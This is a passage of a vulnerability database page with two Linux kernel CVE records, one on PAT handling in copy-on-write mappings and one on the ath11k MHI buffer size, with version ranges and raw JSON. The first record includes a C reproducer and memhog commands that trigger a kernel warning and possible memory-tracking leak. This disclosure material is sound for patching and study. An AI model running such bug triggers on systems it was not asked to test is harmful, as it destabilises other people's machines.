In the Linux kernel, the following vulnerability has been resolved: x86/mm/pat: fix VM_PAT handling in COW mappings PAT handling won't do the right thing in COW mappings: the first PTE (or, in fact, all PTEs) can be replaced during write faults to point at anon folios. Reliably recovering the correct PFN and cachemode using follow_phys() from PTEs will not work in COW mappings. Using follow_phys(), we might just get the address+protection of the anon folio (which is very wrong), or fail on swap/nonswap entries, failing follow_phys() and triggering a WARN_ON_ONCE() in untrack_pfn() and track_pfn_copy(), not properly calling free_pfn_range(). In free_pfn_range(), we either wouldn't call memtype_free() or would call it with the wrong range, possibly leaking memory. To fix that, let's update follow_phys() to refuse returning anon folios, and fallback to using the stored PFN inside vma->vm_pgoff for COW mappings if we run into that. We will now properly handle untrack_pfn() with COW mappings, where we don't need the cachemode. We'll have to fail fork()->track_pfn_copy() if the first page was replaced by an anon folio, though: we'd have to store the cachemode in the VMA to make this work, likely growing the VMA size. For now, lets keep it simple and let track_pfn_copy() just fail in that case: it would have failed in the past with swap/nonswap entries already, and it would have done the wrong thing with anon folios. Simple reproducer to trigger the WARN_ON_ONCE() in untrack_pfn(): <--- C reproducer ---> #include <stdio.h> #include <sys/mman.h> #include <unistd.h> #include <liburing.h> int main(void) { struct io_uring_params p = {}; int ring_fd; size_t size; char *map; ring_fd = io_uring_setup(1, &p); if (ring_fd < 0) { perror("io_uring_setup"); return 1; } size = p.sq_off.array + p.sq_entries * sizeof(unsigned); /* Map the submission queue ring MAP_PRIVATE */ map = mmap(0, size, PROT_READ | PROT_WRITE, MAP_PRIVATE, ring_fd, IORING_OFF_SQ_RING); if (map == MAP_FAILED) { perror("mmap"); return 1; } /* We have at least one page. Let's COW it. */ *map = 0; pause(); return 0; } <--- C reproducer ---> On a system with 16 GiB RAM and swap configured: # ./iouring & # memhog 16G # killall iouring [ 301.552930] ------------[ cut here ]------------ [ 301.553285] WARNING: CPU: 7 PID: 1402 at arch/x86/mm/pat/memtype.c:1060 untrack_pfn+0xf4/0x100 [ 301.553989] Modules linked in: binfmt_misc nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_g [ 301.558232] CPU: 7 PID: 1402 Comm: iouring Not tainted 6.7.5-100.fc38.x86_64 #1 [ 301.558772] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebu4 [ 301.559569] RIP: 0010:untrack_pfn+0xf4/0x100 [ 301.559893] Code: 75 c4 eb cf 48 8b 43 10 8b a8 e8 00 00 00 3b 6b 28 74 b8 48 8b 7b 30 e8 ea 1a f7 000 [ 301.561189] RSP: 0018:ffffba2c0377fab8 EFLAGS: 00010282 [ 301.561590] RAX: 00000000ffffffea RBX: ffff9208c8ce9cc0 RCX: 000000010455e047 [ 301.562105] RDX: 07fffffff0eb1e0a RSI: 0000000000000000 RDI: ffff9208c391d200 [ 301.562628] RBP: 0000000000000000 R08: ffffba2c0377fab8 R09: 0000000000000000 [ 301.563145] R10: ffff9208d2292d50 R11: 0000000000000002 R12: 00007fea890e0000 [ 301.563669] R13: 0000000000000000 R14: ffffba2c0377fc08 R15: 0000000000000000 [ 301.564186] FS: 0000000000000000(0000) GS:ffff920c2fbc0000(0000) knlGS:0000000000000000 [ 301.564773] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 301.565197] CR2: 00007fea88ee8a20 CR3: 00000001033a8000 CR4: 0000000000750ef0 [ 301.565725] PKRU: 55555554 [ 301.565944] Call Trace: [ 301.566148] <TASK> [ 301.566325] ? untrack_pfn+0xf4/0x100 [ 301.566618] ? __warn+0x81/0x130 [ 301.566876] ? untrack_pfn+0xf4/0x100 [ 3 ---truncated---

Severity ?

No CVSS data available.

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f18681daaec9665a1…
	https://git.kernel.org/stable/c/09e6bb53217bf388a…
	https://git.kernel.org/stable/c/c2b2430b48f3c9eac…
	https://git.kernel.org/stable/c/7cfee26d1950250b1…
	https://git.kernel.org/stable/c/97e93367e82752e47…
	https://git.kernel.org/stable/c/51b7841f3fe84606e…
	https://git.kernel.org/stable/c/1341e4b32e1fb1b0a…
	https://git.kernel.org/stable/c/04c35ab3bdae7fefb…

Impacted products

Vendor

Product

Version

Linux

Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < f18681daaec9665a15c5e7e0f591aad5d0ac622b (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 09e6bb53217bf388a0d2fd7fb21e74ab9dffc173 (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4 (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 7cfee26d1950250b14c5cb0a37b142f3fcc6396a (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 97e93367e82752e475a33839a80b33bdbef1209f (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 51b7841f3fe84606ec0bd8da859d22e05e5419ec (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6 (git)
Affected: 5899329b19100c0b82dc78e9b21ed8b920c9ffb3 , < 04c35ab3bdae7fefbd7c7a7355f29fa03a035221 (git)

Linux

Affected: 2.6.29
Unaffected: 0 , < 2.6.29 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35877",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-16T21:13:41.454834Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-16T21:14:37.162Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.797Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f18681daaec9665a15c5e7e0f591aad5d0ac622b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/09e6bb53217bf388a0d2fd7fb21e74ab9dffc173"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7cfee26d1950250b14c5cb0a37b142f3fcc6396a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/97e93367e82752e475a33839a80b33bdbef1209f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/51b7841f3fe84606ec0bd8da859d22e05e5419ec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/04c35ab3bdae7fefbd7c7a7355f29fa03a035221"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/mm/pat/memtype.c",
            "mm/memory.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f18681daaec9665a15c5e7e0f591aad5d0ac622b",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "09e6bb53217bf388a0d2fd7fb21e74ab9dffc173",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "7cfee26d1950250b14c5cb0a37b142f3fcc6396a",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "97e93367e82752e475a33839a80b33bdbef1209f",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "51b7841f3fe84606ec0bd8da859d22e05e5419ec",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            },
            {
              "lessThan": "04c35ab3bdae7fefbd7c7a7355f29fa03a035221",
              "status": "affected",
              "version": "5899329b19100c0b82dc78e9b21ed8b920c9ffb3",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/x86/mm/pat/memtype.c",
            "mm/memory.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.29"
            },
            {
              "lessThan": "2.6.29",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.29",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/mm/pat: fix VM_PAT handling in COW mappings\n\nPAT handling won\u0027t do the right thing in COW mappings: the first PTE (or,\nin fact, all PTEs) can be replaced during write faults to point at anon\nfolios.  Reliably recovering the correct PFN and cachemode using\nfollow_phys() from PTEs will not work in COW mappings.\n\nUsing follow_phys(), we might just get the address+protection of the anon\nfolio (which is very wrong), or fail on swap/nonswap entries, failing\nfollow_phys() and triggering a WARN_ON_ONCE() in untrack_pfn() and\ntrack_pfn_copy(), not properly calling free_pfn_range().\n\nIn free_pfn_range(), we either wouldn\u0027t call memtype_free() or would call\nit with the wrong range, possibly leaking memory.\n\nTo fix that, let\u0027s update follow_phys() to refuse returning anon folios,\nand fallback to using the stored PFN inside vma-\u003evm_pgoff for COW mappings\nif we run into that.\n\nWe will now properly handle untrack_pfn() with COW mappings, where we\ndon\u0027t need the cachemode.  We\u0027ll have to fail fork()-\u003etrack_pfn_copy() if\nthe first page was replaced by an anon folio, though: we\u0027d have to store\nthe cachemode in the VMA to make this work, likely growing the VMA size.\n\nFor now, lets keep it simple and let track_pfn_copy() just fail in that\ncase: it would have failed in the past with swap/nonswap entries already,\nand it would have done the wrong thing with anon folios.\n\nSimple reproducer to trigger the WARN_ON_ONCE() in untrack_pfn():\n\n\u003c--- C reproducer ---\u003e\n #include \u003cstdio.h\u003e\n #include \u003csys/mman.h\u003e\n #include \u003cunistd.h\u003e\n #include \u003cliburing.h\u003e\n\n int main(void)\n {\n         struct io_uring_params p = {};\n         int ring_fd;\n         size_t size;\n         char *map;\n\n         ring_fd = io_uring_setup(1, \u0026p);\n         if (ring_fd \u003c 0) {\n                 perror(\"io_uring_setup\");\n                 return 1;\n         }\n         size = p.sq_off.array + p.sq_entries * sizeof(unsigned);\n\n         /* Map the submission queue ring MAP_PRIVATE */\n         map = mmap(0, size, PROT_READ | PROT_WRITE, MAP_PRIVATE,\n                    ring_fd, IORING_OFF_SQ_RING);\n         if (map == MAP_FAILED) {\n                 perror(\"mmap\");\n                 return 1;\n         }\n\n         /* We have at least one page. Let\u0027s COW it. */\n         *map = 0;\n         pause();\n         return 0;\n }\n\u003c--- C reproducer ---\u003e\n\nOn a system with 16 GiB RAM and swap configured:\n # ./iouring \u0026\n # memhog 16G\n # killall iouring\n[  301.552930] ------------[ cut here ]------------\n[  301.553285] WARNING: CPU: 7 PID: 1402 at arch/x86/mm/pat/memtype.c:1060 untrack_pfn+0xf4/0x100\n[  301.553989] Modules linked in: binfmt_misc nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_g\n[  301.558232] CPU: 7 PID: 1402 Comm: iouring Not tainted 6.7.5-100.fc38.x86_64 #1\n[  301.558772] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebu4\n[  301.559569] RIP: 0010:untrack_pfn+0xf4/0x100\n[  301.559893] Code: 75 c4 eb cf 48 8b 43 10 8b a8 e8 00 00 00 3b 6b 28 74 b8 48 8b 7b 30 e8 ea 1a f7 000\n[  301.561189] RSP: 0018:ffffba2c0377fab8 EFLAGS: 00010282\n[  301.561590] RAX: 00000000ffffffea RBX: ffff9208c8ce9cc0 RCX: 000000010455e047\n[  301.562105] RDX: 07fffffff0eb1e0a RSI: 0000000000000000 RDI: ffff9208c391d200\n[  301.562628] RBP: 0000000000000000 R08: ffffba2c0377fab8 R09: 0000000000000000\n[  301.563145] R10: ffff9208d2292d50 R11: 0000000000000002 R12: 00007fea890e0000\n[  301.563669] R13: 0000000000000000 R14: ffffba2c0377fc08 R15: 0000000000000000\n[  301.564186] FS:  0000000000000000(0000) GS:ffff920c2fbc0000(0000) knlGS:0000000000000000\n[  301.564773] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[  301.565197] CR2: 00007fea88ee8a20 CR3: 00000001033a8000 CR4: 0000000000750ef0\n[  301.565725] PKRU: 55555554\n[  301.565944] Call Trace:\n[  301.566148]  \u003cTASK\u003e\n[  301.566325]  ? untrack_pfn+0xf4/0x100\n[  301.566618]  ? __warn+0x81/0x130\n[  301.566876]  ? untrack_pfn+0xf4/0x100\n[  3\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:07:25.990Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f18681daaec9665a15c5e7e0f591aad5d0ac622b"
        },
        {
          "url": "https://git.kernel.org/stable/c/09e6bb53217bf388a0d2fd7fb21e74ab9dffc173"
        },
        {
          "url": "https://git.kernel.org/stable/c/c2b2430b48f3c9eaccd2c3d2ad75bb540d4952f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/7cfee26d1950250b14c5cb0a37b142f3fcc6396a"
        },
        {
          "url": "https://git.kernel.org/stable/c/97e93367e82752e475a33839a80b33bdbef1209f"
        },
        {
          "url": "https://git.kernel.org/stable/c/51b7841f3fe84606ec0bd8da859d22e05e5419ec"
        },
        {
          "url": "https://git.kernel.org/stable/c/1341e4b32e1fb1b0acd002ccd56f07bd32f2abc6"
        },
        {
          "url": "https://git.kernel.org/stable/c/04c35ab3bdae7fefbd7c7a7355f29fa03a035221"
        }
      ],
      "title": "x86/mm/pat: fix VM_PAT handling in COW mappings",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35877",
    "datePublished": "2024-05-19T08:34:34.604Z",
    "dateReserved": "2024-05-17T13:50:33.110Z",
    "dateUpdated": "2025-05-04T09:07:25.990Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35938 (GCVE-0-2024-35938)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-05-04 09:08

Title

wifi: ath11k: decrease MHI channel buffer length to 8KB

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: decrease MHI channel buffer length to 8KB Currently buf_len field of ath11k_mhi_config_qca6390 is assigned with 0, making MHI use a default size, 64KB, to allocate channel buffers. This is likely to fail in some scenarios where system memory is highly fragmented and memory compaction or reclaim is not allowed. There is a fail report which is caused by it: kworker/u32:45: page allocation failure: order:4, mode:0x40c00(GFP_NOIO|__GFP_COMP), nodemask=(null),cpuset=/,mems_allowed=0 CPU: 0 PID: 19318 Comm: kworker/u32:45 Not tainted 6.8.0-rc3-1.gae4495f-default #1 openSUSE Tumbleweed (unreleased) 493b6d5b382c603654d7a81fc3c144d59a1dfceb Workqueue: events_unbound async_run_entry_fn Call Trace: <TASK> dump_stack_lvl+0x47/0x60 warn_alloc+0x13a/0x1b0 ? srso_alias_return_thunk+0x5/0xfbef5 ? __alloc_pages_direct_compact+0xab/0x210 __alloc_pages_slowpath.constprop.0+0xd3e/0xda0 __alloc_pages+0x32d/0x350 ? mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] __kmalloc_large_node+0x72/0x110 __kmalloc+0x37c/0x480 ? mhi_map_single_no_bb+0x77/0xf0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] ? mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] mhi_prepare_channel+0x127/0x2d0 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] __mhi_prepare_for_transfer+0x44/0x80 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] ? __pfx_____mhi_prepare_for_transfer+0x10/0x10 [mhi 40df44e07c05479f7a6e7b90fba9f0e0031a7814] device_for_each_child+0x5c/0xa0 ? __pfx_pci_pm_resume+0x10/0x10 ath11k_core_resume+0x65/0x100 [ath11k a5094e22d7223135c40d93c8f5321cf09fd85e4e] ? srso_alias_return_thunk+0x5/0xfbef5 ath11k_pci_pm_resume+0x32/0x60 [ath11k_pci 830b7bfc3ea80ebef32e563cafe2cb55e9cc73ec] ? srso_alias_return_thunk+0x5/0xfbef5 dpm_run_callback+0x8c/0x1e0 device_resume+0x104/0x340 ? __pfx_dpm_watchdog_handler+0x10/0x10 async_resume+0x1d/0x30 async_run_entry_fn+0x32/0x120 process_one_work+0x168/0x330 worker_thread+0x2f5/0x410 ? __pfx_worker_thread+0x10/0x10 kthread+0xe8/0x120 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x34/0x50 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1b/0x30 </TASK> Actually those buffers are used only by QMI target -> host communication. And for WCN6855 and QCA6390, the largest packet size for that is less than 6KB. So change buf_len field to 8KB, which results in order 1 allocation if page size is 4KB. In this way, we can at least save some memory, and as well as decrease the possibility of allocation failure in those scenarios. Tested-on: WCN6855 hw2.0 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.30

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/805a1cdde82fec00c…
	https://git.kernel.org/stable/c/6597a6687af54e2cb…
	https://git.kernel.org/stable/c/138fdeac75fb7512a…
	https://git.kernel.org/stable/c/ae5876b3b7b2243d8…
	https://git.kernel.org/stable/c/1cca1bddf9ef08050…

Impacted products

Vendor

Product

Version

Linux

Affected: d5c65159f2895379e11ca13f62feabe93278985d , < 805a1cdde82fec00c7471a393f4bb437b2741559 (git)
Affected: d5c65159f2895379e11ca13f62feabe93278985d , < 6597a6687af54e2cb58371cf8f6ee4dd85c537de (git)
Affected: d5c65159f2895379e11ca13f62feabe93278985d , < 138fdeac75fb7512a7f9f1c3b236cd2e754af793 (git)
Affected: d5c65159f2895379e11ca13f62feabe93278985d , < ae5876b3b7b2243d874e2afa099e7926122087a1 (git)
Affected: d5c65159f2895379e11ca13f62feabe93278985d , < 1cca1bddf9ef080503c15378cecf4877f7510015 (git)

Linux

Affected: 5.6
Unaffected: 0 , < 5.6 (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35938",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T19:33:50.434855Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:22.305Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.059Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/805a1cdde82fec00c7471a393f4bb437b2741559"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6597a6687af54e2cb58371cf8f6ee4dd85c537de"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/138fdeac75fb7512a7f9f1c3b236cd2e754af793"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ae5876b3b7b2243d874e2afa099e7926122087a1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1cca1bddf9ef080503c15378cecf4877f7510015"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/ath/ath11k/mhi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "805a1cdde82fec00c7471a393f4bb437b2741559",
              "status": "affected",
              "version": "d5c65159f2895379e11ca13f62feabe93278985d",
              "versionType": "git"
            },
            {
              "lessThan": "6597a6687af54e2cb58371cf8f6ee4dd85c537de",
              "status": "affected",
              "version": "d5c65159f2895379e11ca13f62feabe93278985d",
              "versionType": "git"
            },
            {
              "lessThan": "138fdeac75fb7512a7f9f1c3b236cd2e754af793",
              "status": "affected",
              "version": "d5c65159f2895379e11ca13f62feabe93278985d",
              "versionType": "git"
            },
            {
              "lessThan": "ae5876b3b7b2243d874e2afa099e7926122087a1",
              "status": "affected",
              "version": "d5c65159f2895379e11ca13f62feabe93278985d",
              "versionType": "git"
            },
            {
              "lessThan": "1cca1bddf9ef080503c15378cecf4877f7510015",
              "status": "affected",
              "version": "d5c65159f2895379e11ca13f62feabe93278985d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/ath/ath11k/mhi.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.6"
            },
            {
              "lessThan": "5.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
